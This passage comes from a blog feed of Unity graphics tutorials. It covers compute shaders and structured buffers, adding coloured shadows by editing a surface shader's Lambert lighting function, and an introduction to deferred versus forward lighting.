<span class="n">Result</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">xy</span><span class="p">]</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">x</span> <span class="o">&</span> <span class="n">id</span><span class="p">.</span><span class="n">y</span><span class="p">,</span> <span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">x</span> <span class="o">&</span> <span class="mi">15</span><span class="p">)</span><span class="o">/</span><span class="mf">15.0</span><span class="p">,</span> <span class="p">(</span><span class="n">id</span><span class="p">.</span><span class="n">y</span> <span class="o">&</span> <span class="mi">15</span><span class="p">)</span><span class="o">/</span><span class="mf">15.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is a really good place to start figuring out compute shaders, so let’s go through it line by line:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel CSMain</span></code></pre></figure>
<p>This specifies the entry point to the program (essentially the compute shader’s “main”). A single compute shader file can have a number of these functions defined, and you can call whichever one you need from script.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">RWTexture2D</span><span class="o"><</span><span class="n">float4</span><span class="o">></span> <span class="n">Result</span><span class="p">;</span></code></pre></figure>
<p>This declares a variable that contains data the shader program will work wth. Since we aren’t working with mesh data, you have to explicitly declare what data your compute shader will read and write to. The “RW” in front of the datatype specifies that the shader will both read and write to that variable.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span></code></pre></figure>
<p>This line specifies the dimensions of the thread groups being spawned by our compute shader. GPUs take advantage of the massive parallel processing powers of the GPU by creating threads that run simultaneously. Thread groups specify how to organize these spawned threads. In the code above, we are specifying that we want each group of threads to contain 64 threads, which can be accessed like a 2D array.</p>
<p>Determining the optimum size of your thread groups is a complicated issue, and is largely related to your target hardware. In general, think of your gpu as a collection of stream processors, each of which is capable of executing X threads simultaneously. Each processor runs 1 thread group at a time, so ideally you want your thread group to contain X threads to take best advantage of the processor. I’m still at the point where I’m playing with these values to really get a handle on them, so rather than dispense advice on how best to set these values, I’ll leave it up to you to google (and then share <a href="http://twitter.com/khalladay">on twitter</a> :D ).</p>
<p>The rest of the shader is pretty much regular code. The kernel function determines what pixel it should be working on based on the id of the thread running the function, and writes some data to the Result buffer. Easy right?</p>
<h2>Actually Running The Shader</h2>
<p>Obviously we can’t attach a compute shader to a mesh and expect it to run, especially since it isn’t working with mesh data. Compute shaders actually need to be set up and called from scripts, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">kernelHandle</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"CSMain"</span><span class="p">);</span>
<span class="n">RenderTexture</span> <span class="n">tex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="mi">256</span><span class="p">,</span><span class="mi">256</span><span class="p">,</span><span class="mi">24</span><span class="p">);</span>
<span class="n">tex</span><span class="p">.</span><span class="n">enableRandomWrite</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="n">tex</span><span class="p">.</span><span class="n">Create</span><span class="p">();</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetTexture</span><span class="p">(</span><span class="n">kernelHandle</span><span class="p">,</span> <span class="s">"Result"</span><span class="p">,</span> <span class="n">tex</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernelHandle</span><span class="p">,</span> <span class="mi">256</span><span class="o">/</span><span class="mi">8</span><span class="p">,</span> <span class="mi">256</span><span class="o">/</span><span class="mi">8</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>There are a few things to note here. First is setting the enableRandomWrite flag of your render texture BEFORE you create it. This gives your compute shaders access to write to the texture. If you don’t set this flag you won’t be able to use the texture as a write target for the shader.</p>
<p>Next we need a way to identify what function we want to call in our compute shader. The FindKernel function takes a string name, which corresponds to one of the kernel names we set up at the beginning of our compute shader. Remember, a Compute Shader can have multiple kernels (functions) in a single file.</p>
<p>The ComputeShader.SetTexture call lets us move the data we want to work with from CPU memory to GPU memory. Moving data between memory spaces is what will introduce latency to your program, and the amount of slowdown you see is proportional to the amount of data that you are transferring. For this reason, if you plan on running a compute shader every frame you’ll need to aggressively optimize how much data is actually get operated on.</p>
<p>The three integers passed to the Dispatch call specify the number of thread groups we want to spawn. Recall that each thread group’s size is specified in the numthreads block of the compute shader, so in the above example, the number of total threads we’re spawning is as follows:</p>
<div align="center"><i>32*32 thread groups * 64 threads per group = 65536 threads total.</i></div>
<p>This ends up equating to 1 thread per pixel in the render texture, which makes sense given that the kernel function can only operate on 1 pixel per call.</p>
<p>So now that we know how to write a compute shader that can operate on texture memory, let’s see what else we can get these things to do.</p>
<div align="center">
<img src="/images/post_images/2014-06-30/gpgpu.jpg" />
<br />
<br />
</div>
<h2>Structured Buffers Are Freaking Sweet</h2>
<p>Modifying texture data is a bit too much like vert/frag shaders for me to get too excited; it’s time to unshackle our GPU and get it working on arbitrary data. Yes it’s possible, and it’s as awesome as it sounds.</p>
<p>A structured buffer is just an array of data consisting of a single data type. You can make a structured buffer of floats, or one of integers, but not one of floats and integers. You declare a structured buffer in a compute shader like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">StructuctedBuffer</span><span class="o"><</span><span class="kt">float</span><span class="o">></span> <span class="n">floatBuffer</span><span class="p">;</span>
<span class="n">RWStructuredBuffer</span><span class="o"><</span><span class="kt">int</span><span class="o">></span> <span class="n">readWriteIntBuffer</span><span class="p">;</span></code></pre></figure>
<p>What makes these buffers more interesting though, is the ability for that data type to be a struct, which is what we’ll do for the second (and last) example in this article.</p>
<p>For our example, we’re going to be passing our compute shader a set of points, each of which has a matrix that we want to transform it by. We could accomplish this with 2 separate buffers (one of Vector3s and one of Matrix4x4s), but it’s easier to conceptualize a point/matrix pair if they’re together in a struct, so let’s do that.</p>
<p>In our c# script, we’ll define the data type as follows:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">VecMatPair</span>
<span class="p">{</span>
<span class="k">public</span> <span class="n">Vector3</span> <span class="n">point</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Matrix4x4</span> <span class="n">matrix</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We also need to define this data type inside our shader, but HLSL doesn’t have a Matrix4x4 or Vector3 type. However, it does have data types which map to the same memory layout. Our shader might end up looking like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#pragma kernel Multiply
</span>
<span class="k">struct</span> <span class="nc">VecMatPair</span>
<span class="p">{</span>
<span class="n">float3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">float4x4</span> <span class="n">mat</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">RWStructuredBuffer</span><span class="o"><</span><span class="n">VecMatPair</span><span class="o">></span> <span class="n">dataBuffer</span><span class="p">;</span>
<span class="p">[</span><span class="n">numthreads</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)]</span>
<span class="kt">void</span> <span class="nf">Multiply</span> <span class="p">(</span><span class="n">uint3</span> <span class="n">id</span> <span class="o">:</span> <span class="n">SV_DispatchThreadID</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">mat</span><span class="p">,</span>
<span class="n">float4</span><span class="p">(</span><span class="n">dataBuffer</span><span class="p">[</span><span class="n">id</span><span class="p">.</span><span class="n">x</span><span class="p">].</span><span class="n">pos</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that our thread group is now organized as a 1 dimensional array. There is no performance impact regarding the dimensionality of the thread group, so you’re free to choose whatever makes the most sense for your program.</p>
<p>Setting up a structured buffer in a script is a bit different from the texture example we did earlier. For a buffer, you need to specify how many bytes a single element in the buffer is, and store that information along with the data itself inside a compute buffer object. For our example struct, the size in bytes is simply the number of float values we are storing (3 for the vector, 16 for the matrix) multiplied by the size of a float (4 bytes), for a total of 76 bytes in a struct. Setting this up in a compute buffer looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">data</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="c1">//INITIALIZE DATA HERE</span>
<span class="n">ComputeBuffer</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="n">ComputeBuffer</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">76</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">SetData</span><span class="p">(</span><span class="n">data</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">kernel</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"Multiply"</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetBuffer</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="s">"dataBuffer"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Now we need to get this modified data back into a format that we can use in our script. Unlike the example above with a render texture, structured buffers need to explicitly be transferred from the GPU’s memory space back to the CPU. In my experience, this is the spot where you’ll notice the biggest performance hit when using compute shaders, and the only ways I’ve found to mitigate it are to optimize your buffers so that they’re as small as possible while still being useable and to only pull data out of your shader when you absolutely need it.</p>
<p>The actual code to get the data back to the cpu is actually really simple. All you need is an array of the same data type and size as the buffer’s data to write to. If we modified the above script to write the resulting data back to a second array, it might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="n">ComputeShader</span> <span class="n">shader</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">RunShader</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">data</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="n">VecMatPair</span><span class="p">[]</span> <span class="n">output</span> <span class="o">=</span> <span class="k">new</span> <span class="n">VecMatPair</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span>
<span class="c1">//INITIALIZE DATA HERE</span>
<span class="n">ComputeBuffer</span> <span class="n">buffer</span> <span class="o">=</span> <span class="k">new</span> <span class="n">ComputeBuffer</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">76</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">SetData</span><span class="p">(</span><span class="n">data</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">kernel</span> <span class="o">=</span> <span class="n">shader</span><span class="p">.</span><span class="n">FindKernel</span><span class="p">(</span><span class="s">"Multiply"</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">SetBuffer</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="s">"dataBuffer"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="n">shader</span><span class="p">.</span><span class="n">Dispatch</span><span class="p">(</span><span class="n">kernel</span><span class="p">,</span> <span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="n">buffer</span><span class="p">.</span><span class="n">GetData</span><span class="p">(</span><span class="n">output</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>That’s really all there is to it. You may need to watch the profiler for a bit to get a sense of exactly how much time you’re burning transferring data to and from the cpu, but I’ve found that once you’re operating on a big enough data set compute shaders really pay dividends.</p>
<p>One last thing - once you’re done working with your buffer, you should call buffer.Dispose() to make sure the buffer can be GC’ed. (Thanks to Andreas S for e-mailing me with this addition, and a few other corrections!).</p>
<p>If you have any questions about this (or spot a mistake in what’s here), send me a send me a message <a href="http://twitter.com/khalladay">on twitter</a>. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!</p>
Colouring Shadows in Unity2014-05-16T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2014/05/16/Coloured-Shadows-In-Unity<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>If you’ve ever looked for help getting different coloured shadows in your Unity game, you were probably surprised by how little there is on the forums in the way of help. In fact, at the time of writing this, the most help that google turned up was a $50 package on the asset store. Colouring shadows is not that hard, in fact, it’s only a few lines of shader code.</p>
<p>This post is going to show you a really simple way to get some really groovy shadows in Unity.</p>
<div align="center">
<img src="/images/post_images/2014-05-16/purple_shadows.png" />
<br />
<font size="2">I added water to make this seem more impressive.</font>
<br />
</div>
<p><br /></p>
<h2>Time to Get Fabulous</h2>
<p>To make this simple, we’re going to be writing a surface shader today. It’s important to note that the shader we’re writing will set the colour of the shadows being received by the object being shaded, not the colour of the shadows cast by that object onto others. If you want the ground to show coloured shadows, the ground needs to have a shadow colouring shader. In the image above, both the sphere and the ground have the shader applied.</p>
<p>Let’s add coloured shadows to the default diffuse shader that comes with unity. First off, we’ll need the source for that. You can grab the source for all the built in shaders in Unity from their <a href="http://unity3d.com/unity/download/archive">downloads page</a>.</p>
<p>The default diffuse shader is in a file called Normal-Diffuse.shader. So let’s open it up, and copy the contents into a new shader in Unity:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Colored Diffuse"</span> <span class="p">{</span>
<span class="n">Properties</span> <span class="p">{</span>
<span class="n">_Color</span> <span class="p">(</span><span class="s">"Main Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span> <span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_Color</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fixed4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">)</span> <span class="o">*</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="n">Fallback</span> <span class="s">"VertexLit"</span>
<span class="p">}</span></code></pre></figure>
<p>If you throw this on a material it should, unsurprisingly, look exactly like the “Diffuse” shader that comes with Unity. Now it’s time to have some fun. We’re going to need to write our own lighting function to get the shadows the colour we want them. Right now the shader is using the built in “Lambert” function, and ideally, our lighting should look exactly like it, just more fabulous. The easiest way to do this is to just grab the source for the Lambert function and modify that directly.</p>
<p>That built in shaders folder you downloaded also has the source code for the lighting functions (inside the file Lighting.cginc). If you open it up, and ctrl+f for “Lambert” you’ll find what we’re looking for. Let’s paste that into our shader as well:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf CSLambert
</span><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span> </code></pre></figure>
<p>You’ll notice I changed the name of the lighting function (and the #pragma line which specifies which function to use). This is just to avoid confusion with the original Lambert function.</p>
<p>The lighting function is responsible for outputting the final colour of the object, which includes the colour of the shadowed area. The atten term you see above is the shadow multiplier. The higher the atten value, the brighter the surface, a low value points to the fragment being in shadow. The lower the atten value, the darker the shadows.</p>
<p>Since we know that any atten value less than 1.0 means that the fragment is in shadow, subtracting atten from 1.0 will give us the strength that the shadow colour needs to be. Lighter shadows (a higher atten) will naturally have a lighter shadow colour.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//shadow colorization</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="n">_ShadowColor</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="p">(</span><span class="mf">1.0</span><span class="o">-</span><span class="n">atten</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span> </code></pre></figure>
<p>Make sure that you also add the _ShadowColor color property to the shader, and as a uniform inside your CG Program. Then throw this shader onto one of your objects, and watch the magic happen.</p>
<p>You may have noticed that the above change doesn’t account for diffuse shadows, that is, unlit sides of a diffuse material. You end up with a really weird looking dissonance between the object’s dark areas, and the areas that are receiving shadows.</p>
<div align="center">
<img src="/images/post_images/2014-05-16/no_diffuse.png" />
<br />
<font size="2">Notice the difference between the areas being self shadowed, and the areas that are unlit.</font>
<br />
</div>
<p><br />
This happens because although the atten value tell us if we’re being shadowed by another object, it doesn’t account for a fragment being dark as a result of it’s own lighting function. In the case of a diffuse material, this is when it is pointing away from all relevant light sources.</p>
<p>What we need is to have our shadow colouring take into account both the atten value and the lighting. We can do that like so:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">half4</span> <span class="nf">LightingCSLambert</span> <span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">s</span><span class="p">,</span> <span class="n">half3</span> <span class="n">lightDir</span><span class="p">,</span> <span class="n">half</span> <span class="n">atten</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">max</span> <span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">dot</span> <span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">Normal</span><span class="p">,</span> <span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="p">(</span><span class="n">diff</span> <span class="o">*</span> <span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">//shadow colorization</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="n">_ShadowColor</span><span class="p">.</span><span class="n">xyz</span> <span class="o">*</span> <span class="n">max</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,(</span><span class="mf">1.0</span><span class="o">-</span><span class="p">(</span><span class="n">diff</span><span class="o">*</span><span class="n">atten</span><span class="o">*</span><span class="mi">2</span><span class="p">)))</span> <span class="o">*</span> <span class="n">_DiffuseVal</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">Alpha</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Put it all together and you should end up with the most fabulous shadow colours you’ve ever seen!</p>
<p>Extending this to other shaders is very similar to what we did here, simply grab the source for the shader you want to modify from the built in shader source, and modify the lighting function to add shadow colour based on that specific lighting function’s equation.</p>
<p>If you have any questions about this (or spot a mistake in what’s here), send me a send me a message <a href="http://twitter.com/khalladay">on twitter</a>. I won’t write shaders for you, but I’m happy to point you in the right direction for your specific use case. Happy shading!</p>
Writing Shaders for Deferred Lighting in Unity3D2014-04-05T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/04/05/Writing-Shaders-For-Deferred-Lighting-Unity<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>Awhile ago, I wrote a post called <a href="http://kylehalladay.com/all/blog/2013/10/13/Multi-Light-Diffuse.html">Writing Multi Light Pixel Shaders in Unity</a>, and covered the basics of how to write shaders that use a whole bunch of lights in forward rendering. This post is the (8 months late) sequel to that post, in which I’m going to talk about the basics of writing shaders for deferred lighting in Unity.</p>
<p>Unlike last time though, we’re going to be writing surface shaders today; I’ll explain why that is below. If you’re unfamiliar with surface shaders, now would probably be a good time to head over to the <a href="https://docs.unity3d.com/Documentation/Components/SL-SurfaceShaders.html">Unity docs</a> and read up a little bit. Don’t worry about grokking all of it though, we aren’t doing anything fancy today.</p>
<p>If you’re dead set on writing pixel shaders that work with deferred lighting, check out my post on that <a href="http://kylehalladay.com/blog/tutorial/2015/01/03/Deferred-Pixel-Shaders.html">here</a></p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_intro.png" />
<br />
<font size="2">A quick demo of deferred lighting: all 16 lights in the scene are treated as pixel lights</font>
<br />
</div>
<p><br /></p>
<p>It seems easiest to start by describing how forward rendering and deferred lighting work so that we can see how they differ from one another, and understand what our shaders are actually doing in the deferred rendering path.</p>
<h2>A Very Brief Intro to Forward Rendering</h2>
<p>In traditional forward rendering, each object is drawn once for every pixel light that touches it (with all the vertex lights being lumped into the base pass). Each pass works independently of the other passes, and runs a vertex and a fragment shader to do its magic (and then adds that result to the previous passes).</p>
<p>This works great for simple scenes, but when you need to have a large number of lights it can get bogged down pretty quickly. To use draw calls as an example: in forward rendering your draw call count is (roughly) numberOfObjects * numberOfLights.</p>
<p>For example: the screenshot above has 16 spheres, each being lit by 16 pixel lights, predictably, this results in 256 draw calls, as shown in the stats window:</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Forward_drawcalls.png" />
</div>
<p><br /></p>
<p>Normally unity would be using a bunch of tricks to minimize those draw calls, by batching calls, and automatically setting some lights to vertex lights, but I’ve turned all that off for demonstration purposes.</p>
<p>So if forward rendering chokes with tons of lights, how do games render scenes with hundreds of lights in them? That’s where deferred techniques come in.</p>
<h2>A Brief Intro to Deferred Lighting</h2>
<p>Deferred lighting solves the problem of handling a large number of lights by assuming that all objects use the same lighting model, and then calculating the lighting contribution to each pixel on the screen in a single pass. This allows the rendering speed to be dependent on the number of pixels being rendered, not the objects in the scene.</p>
<p>As described in greater detail in <a href="http://docs.unity3d.com/Documentation/Components/RenderTech-DeferredLighting.html">the docs</a>, Unity’s deferred lighting system is a 3 step process.</p>
<ol>
<li>
<strong>Step 1</strong>: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer). </li>
<li><br />
<strong>Step 2:</strong> the previously built buffers are combined to compute the lighting for each pixel on the screen.
</li><br />
<li>
<strong>Step 3</strong>: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).
</li>
</ol>
<p>As you may have guessed, this technique comes with much more overhead than forward rendering, but it also scales much better for complex scenes. To relate things back to draw calls, each object produces 2 draw calls, and each light produces 1 call (+1 for lightmapping). Thus, the example scene from above ends up being roughly 16 ∗ 2 + 16 ∗ 2. Unity’s window says 65 draw calls, don’t ask me where that extra one came from.</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_drawcalls.png" />
</div>
<p><br /></p>
<p>It’s worth noting that draw calls really aren’t a great way to measure how performant a rendering technique is, but they’re a useful way to understand how these techniques differ from one another. In actuality, it’s more useful to say that forward rendering’s performance is dependent on the number of lights and objects in a scene, whereas deferred lighting’s performance is dependent on the number of lights and the number of pixels being lit on the screen.</p>
